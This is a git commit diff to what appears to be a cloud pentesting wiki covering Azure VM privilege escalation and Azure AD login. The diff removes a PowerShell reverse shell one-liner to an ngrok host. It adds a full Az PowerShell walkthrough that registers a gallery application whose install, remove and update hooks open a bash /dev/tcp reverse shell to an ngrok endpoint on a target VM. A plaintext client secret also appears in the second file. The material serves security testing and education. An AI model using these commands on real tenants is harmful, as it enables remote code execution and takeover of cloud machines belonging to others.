
Commit 049e108

committed
fix
1 parent d448ce4 commit 049e108

2 files changed

Lines changed: 104 additions & 6 deletions


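--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
@@ -232,11 +232,6 @@ export URL_PACKAGE=$(az storage blob generate-sas \
 --https-only \
 --full-uri \
 -o tsv)
-
-# Alternative commands for Powrhsell reverse shell
-## Note that this would be detected by Defender (but it's an extarting point)
-## Add in the install, remove and update commands
-echo '$client = New-Object System.Net.Sockets.TCPClient(\"6.tcp.eu.ngrok.io\",19507);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
 ```
 
 {{#endtab }}
@@ -280,6 +275,109 @@ az vm application set \
 --name deleteme-win4 \
 --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \
 --treat-deployment-as-failure true
+
+# You can create a SAS URL from a blob with something like:
+export EXPIRY=$(date -u -v +1d '+%Y-%m-%dT%H:%MZ')
+export URL_PACKAGE=$(az storage blob generate-sas \
+--account-name <acc-name> \
+--container-name <container-name> \
+--name <filename> \
+--permissions r \
+--expiry "$EXPIRY" \
+--https-only \
+--full-uri \
+-o tsv)
+```
+
+{{#endtab }}
+
+{{#tab name="Az" }}
+
+```bash
+##### GET VM #####
+
+Get-AzVm
+# Check that location is "Central US", the gallery and app mUST be in the same location
+
+$vmName="vm-name"
+
+
+
+##### CREATE SAS TOKEN TO USE IN A USELESS BLOB #####
+
+$rg="rg-name"
+
+# Get and set storage account
+Get-AzStorageAccount
+
+$accountName = "account-name"
+
+# Get and set container inside the storage
+Get-AzStorageContainer -Context (Get-AzStorageAccount -name $accountName -ResourceGroupName $rg).context
+
+$containerName = "container-name"
+
+# Upload dummy file
+$key = (Get-AzStorageAccountKey -ResourceGroupName $rg -Name $accountName)[0].Value
+$ctx = New-AzStorageContext -StorageAccountName $accountName -StorageAccountKey $key
+echo "test" > /tmp/test.txt
+$blobName = "test.txt"
+Set-AzStorageBlobContent -File /tmp/test.txt -Container $containerName -Blob "$blobName" -Context $ctx
+
+# Generate SAS token
+$expiry = (Get-Date).ToUniversalTime().AddDays(1).ToString("yyyy-MM-ddTHH:mmZ")
+$sasToken = New-AzStorageBlobSASToken `
+-Container $containerName `
+-Blob $blobName `
+-Permission r `
+-ExpiryTime $expiry `
+-FullUri `
+-Context $ctx
+
+
+
+##### CREATE GALLERY AND APP #####
+
+$rg = "rg-name"
+$location = "Central US"
+$galleryName = "myGallery"
+$appName = "myReverseShellApp"
+$subscription="subscription-id"
+
+# Create gallery
+New-AzGallery -ResourceGroupName $rg -Name $galleryName -Location $location
+
+# Create app in gallery
+New-AzGalleryApplication `
+-ResourceGroupName $rg `
+-GalleryName $galleryName `
+-Name $appName `
+-Location $location `
+-SupportedOSType Linux
+
+
+# Create app version
+$versionName = "1.0.2"
+## create ngrok listener
+
+New-AzGalleryApplicationVersion `
+-ResourceGroupName $rg `
+-GalleryName $galleryName `
+-GalleryApplicationName $appName `
+-Name $versionName `
+-Location $location `
+-PackageFileLink "$sasToken" `
+-Install "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" `
+-Remove "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" `
+-Update "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'"
+
+
+# Launch app
+$appVersionId = "/subscriptions/$subscription/resourceGroups/$rg/providers/Microsoft.Compute/galleries/$galleryName/applications/$appName/versions/$versionName"
+$app = New-AzVmGalleryApplication -PackageReferenceId $appVersionId
+$vm = Get-AzVM -ResourceGroupName $rg -Name $vmName
+Add-AzVmGalleryApplication -VM $vm -GalleryApplication $app
+Update-AzVM -ResourceGroupName $rg -VM $vm
 ```
 
 {{#endtab }}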

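--- a/src/pentesting-cloud/azure-security/az-services/az-azuread.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-azuread.md
@@ -101,7 +101,7 @@ Connect-AzAccount -Credential $creds
 
 # Connect with access token
 Connect-AzAccount -AccountId test@corp.onmicrosoft.com [-AccessToken $ManagementToken] [-GraphAccessToken $AADGraphToken] [-MicrosoftGraphAccessToken $MicrosoftGraphToken] [-KeyVaultAccessToken $KeyVaultToken]
-# If connecting with some metadata token just use "-AccountId asdasd@example.com" and it will work
+# If connecting with some metadata token, in "-AccountId" put the OID of the managed identity (get it from the JWT token)
 
 # Connect with Service principal/enterprise app secret
 $password = ConvertTo-SecureString 'KWEFNOIRFIPMWL.--DWPNVFI._EDWWEF_ADF~SODNFBWRBIF' -AsPlainText -Force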
